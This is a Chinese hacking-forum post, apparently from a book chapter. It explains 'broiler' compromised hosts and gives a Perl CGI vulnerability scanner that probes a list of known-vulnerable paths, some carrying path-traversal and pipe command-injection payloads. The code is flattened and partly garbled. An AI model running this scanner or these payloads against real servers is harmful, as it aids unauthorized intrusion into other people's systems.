王旭东 发表于 2015-1-5 16:24

工具的编写 Perl程序




    很多黑客教程里面都有“肉鸡”的名词,究竟这是指什么呢?这是指具有利用价值的系统,例如当黑客使用的系统System经过攻击掌握了一台叫做Clink的系统之后,这台被控制的Clink就称作“肉鸡”,黑客可以直接在它上面对其他系统继续攻击。Clink如果具有Perl程序解释权限,那么对黑客来说就具备了基本的利用价值,因为Perl可以编写出很多具有攻击力的程序,在服务器Clink上运行这些程序显而易见要比在System上运行快的多、也安全的多。
    在http://www.hack-net.com/上可以找到很多利用Perl编写的扫描器、攻击程序,将这些程序上传到具有Perl权限的服务器上,然后修改文件的属性数值为可执行,之后通过浏览器直接访问就可以完成相应的操作了。
    本书前面在编写电子邮件炸弹的时候,简单的介绍过这种程序,现在我们再看看如何使用Perl编写漏洞扫描软件:
#! /usr/bin/perl# ============================================================================# CGI 漏洞扫描软件# ============================================================================use Socket;$version = "Cgi Scanner v1.0";%exploits = ( "VTI PVT " => "/_vti_pvt/service.pwd",                "VTI PVT " => "/_vti_pvt/administrators.pwd",                "VTI BIN " => "/_vti_bin/shtml.exe",                "un1g1.1" => "/cgi-bin/unlg1.1",               "gH.cgi" => "/cgi-bin/gH.cgi",               "nph-test-cgi(Bugtraq ID 686)" => "/cgi-bin/nph-test-cgi",               "nph-publish" => "/cgi-bin/nph-publish",               "Handler(Bugtraq ID 380)" => "/cgi-bin/handler",               "Webdist.cgi(Bugtraq ID 374)" => "/cgi-bin/webdist.cgi",               "faxsurvey" => "/cgi-bin/faxsurvey",               "wwwboard.cgi" => "/cgi-bin/wwwboard.cgi",               "campas" => "/cgi-bin/campas",               "AT-admin.cgi" => "/cgi-bin/AT-admin.cgi",               "filemail.pl" => "/cgi-bin/filemail.pl",               "info2www" => "/cgi-bin/info2www",               "files.pl" => "/cgi-bin/files.pl",               "Finger" => "/cgi-bin/finger",               "classifieds.cgi" => "/cgi-bin/classifieds.cgi",                "environ.cgi" => "/cgi-bin/environ.cgi",               "Webbbs.cgi(Bugtraq ID 803)" => "/cgi-bin/webbbs.cgi",               "whois_raw.cgi(Bugtraq ID 304)" => "/cgi-bin/whois_raw.cgi",               "Anyboard.cgi" => "/cgi-bin/AnyBoard.cgi",                "/scripts/issadmin/bdir.htr" => "/scripts/issadmin/bdir.htr",               "Msadc" => "/msadc/Samples/SELECTOR/showcode.asp",                            "/iisadmpwd/aexp2.htr" => "/iisadmpwd/aexp2.htr",                "/iisadmpwd/anot3.htr" => "/iisadmpwd/anot3.htr",               "5daydatacopier.cgi" => "/cgi-bin/day5datacopier.cgi",               "passwd.txt" => "/cgi-bin/passwd.txt",               "password" => "/cgi-bin/password",                  "/etc/group" => "/etc/group",                "/~root" => "/~root",                "Upload.pl" => "/cgi-bin/upload.pl",                "formmail.pl" => "/cgi-bin/formmail.pl",                "sendform.cgi" => "/cgi-bin/sendform.cgi",                "_AuthChangeUrl" => "/cgi-bin/_AuthChangeUrl",               "No-such-file.pl" => "/scripts/no-such-file.pl",                "/......" => "/....../",                "To long!" => "/.html/............./config.sys",                "/_vti_pvt/shtml.exe" => "/_vti_pvt/shtml.exe",                "/_vti_inf.html" => "/_vti_inf.html",                "cgi-shl/win-c-sample.exe" => "/cgi-shl/win-c-sample.exe",                "default.asp" => "/default.asp",                "Server%20logfile" => "/server%20logfile",                "dcmcfg.nsf" => "/domcfg.nsf/?open",                "Webhits.exe" => "/scripts/samples/search/webhits.exe",                "fpexplore.exe" => "/cgi-bin/fpexplore.exe",                "gueryhit.htm" => "/samples/search/queryhit.htm",                "ss.cfg" => "/ss.cfg",                "visadmin.exe" => "/cgi-bin/visadmin.exe?user=guest",                "input.bat(Bugtraq ID 762)" => "/cgi-bin/input.bat?|dir..\..\windows",                "indes.asl::$DATA" => "/index.asp::$DATA",                "//../../config.sys" => "//../../config.sys",                                 "/../../config.sys" => "/../../config.sys",                "main.asp%81" => "/main.asp%81",                "/adsamples/config/site.csc" => "/adsamples/config/site.csc",               "isn.dll" => "/scripts/iisadmin/ism.dll?http/dir",                "Search.cgi(Bugtraq ID 921)" => "/cgi-bin/search.cgi",                                 "bb-hist.sh(Bugtraq ID 142)" => "/cgi-bin/bb-hist.sh",                              "kcms_configure(Bugtraq ID 452)" => "/usr/openwin/bin/kcms_configure",                                 "Bugtraq ID 162" => "/cgi-bin/s97_cgi s97r_cgi tasmgr",                                 "ppdscgi.exe(Bugtraq ID 491)" => "/cgi-bin/ppdscgi.exe",                                                 "dfire.cgi(Bugtraq ID 564)" => "/cgi-bin/dfire.cgi",                                 "guestbook.pl(Bugtraq ID 776)" => "/cgi-bin/guestbook.pl",                              "Anyform.cgi(Bugtraq ID 719)" => "/cgi-bin/AnyForm.cgi",                                 "w3-msql(Bugtraq ID 591, 898)" => "/cgi-bin/w3-msql",                                 "Bugtraq ID 770" => "/cgi-bin/tst.bat|type%20c:\file.txt",                              "Bugtraq ID 770" => "/cgi-bin/alibaba.pl|dir",                              "Bugtraq ID 770" => "/cgi-bin/tst.bat|type%20c:\file.txt",                              "status.cgi(Bugtraq ID 914)" => "/cgi-bin/status.cgi",                               "FormHandler 1.0, 2.0(Bugtraq ID 799, 798)" => "/cgi-bin/FormHandler.cgi",                              "webwho.pl(Bugtraq ID 892)" => "/cgi-bin/webwho.pl",                              "carbo.dll" => "/carbo.dll" );&menu();sub menu() {print "\n\n";print "                        $version\n\n";print "         Based on source code of [ Infinity Scanner v1.3 ]\n\n";print "                        1) Cgi Sonar\n";print "                        2) About Cgi Sonar\n";print "                        3) Exploit Info\n";print "                        4) Help\n"; print "                        5) Exit\n";print "Command: ";chop($selection=);if($selection == "1") { &cgiscanner() }if($selection == "2") { &infomessage() }if($selection == "3") { &exploitinfo() } if($selection == "4") { &helpmessage() } if($selection == "5") { &exitcgisonar() }else { &menu() }}sub cgiscanner() {if($usehostlist eq "yes") { &exploituselist(); }else { &exploitnouselist(); }}sub exploituselist() {        print "\nServerlist Filename: ";        chop($hostlist=);        open(INF,"$hostlist") or &dienice("Can't open $hostlist");        @hostsarray = ;        close(INF);        print "\nEnable Logging?(Saved as gotcha.log) : ";        chop($storelogs=);                foreach $host (@hostsarray) {                chop($host)                &cgiscannerloop("$host");        }        &menu();}sub exploitnouselist() {        print "\nHost: ";        chop($host=);        print "\nEmable Logging?(Saved as gotcha.log) : ";        chop($storelogs=);        &cgiscannerloop("$host");        &menu();}sub cgiscannerloop() {$host = "@_";$serverIP = inet_aton($host);$serverAddr = sockaddr_in(80, $serverIP);$number = 0;print "\n\nChecking $host for known exploits:\n\n";foreach $key (keys %exploits) {socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp'));gethostbyname($host) or print "Ack! No Ip Address was entered\n";if(!gethostbyname($host)) { print "Can't Resolve host!\n"; }else {if(connect(CLIENT, $serverAddr)) {send(CLIENT,"GET $exploits{$key} HTTP/1.0\n\n",0);        $check=;        ($http,$code,$therest) = split(/ /,$check);        if($code == 200) {        print "Exploit Found: $key\nLocation: $exploits{$key}\n\n";         $number++;        if($storelogs eq "yes") {                open(GOTCHA, ">>gotcha.log") or &dienice("Couldn't opengotcha.log for writing.Please make sure the file exists and iswritable.\n");        print GOTCHA "Exploit Found: $key\nServer:$host\nLocation: $exploits{$key}\n\n";                 close(GOTCHA);         }        }else { if($verbosemode eq "y") { print "$key Exploits Not Found\n"; } }}close (CLIENT);}}if($number == 0) { print "No exploitable holes found on host $host\n"; }}sub infomessage() { print"               Cgi Scanner v1.0 by Maxview\n\n"; chop($uselessvariable=);}sub exploitinfo() {print"                        Exploit Info\n\n";print" If you are having trouble finding info on the exploits found\n"; print" on a certain host you have scanned... I strongly suggest you \n";print" look for info on the exploits found on a host at the following\n"; print" sites... http://www.securityfocus.com, www.rootshell.com, or\n";print" http://packetstorm.securify.com... If you are confused about\n";print" the Bugtraq ID's... Then simply go to http://www.securityfocus.com\n";print" /level2/bottom.html?go=vulnerabilities and click on the Bugtraq ID\n";print" tab and type in the ID number in the blank box... All the info\n";   print" you will need will be in the newly loaded page...\n\n";print "Press enter to continue..."; chop($uselessvariable=); }sub helpmessage() {print"                        Help\n\n";print"                  Cgi Scanner command's\n\n"; print" 1) Cgi Scanner- Scans for known Cgi exploits on a remote host...\n"; print" 2) About Cgi Scanner- Informs you about Cgi Scanner...\n"; print" 3) Help- Informs you on certain aspects of Cgi Scanner...\n"; print" 4) Exit- It simply exits you out of the Cgi Scanner...\n\n"; print"                     Sub command's\n\n";                  print" Host:- Allows you to type in the IP of the host you wish\n";print" to scan (e.g. 127.0.0.1)...\n";print" Enable Logging- Logs exploits found, Host IP, etc...\n";print"            Thank you for using Cgi Scanner\n\n";print "Press enter to continue..."; chop($uselessvariable=); } sub exitcgisonar() { exit 1; }    程序看上去很复杂,但实际上和C语言编写的漏洞扫描其原理是一样的,都是先通过Socket与服务器建立连接,然后发送Get请求查询指定的文件是否存在,如果存在则报告文件的位置。这个程序中定义了很多种不同的漏洞,作为学习者应该努力掌握这些漏洞的原理和利用方法。


风霜 发表于 2015-1-5 17:39

这也太乱了吧

yyz219 发表于 2015-1-5 19:40

manbajie 发表于 2015-1-6 20:29

啊哈   这个有点…

minisys 发表于 2015-2-1 21:28

顶楼主一个,写漏洞扫描器的都是牛人
页: [1]
查看完整版本: 工具的编写 Perl程序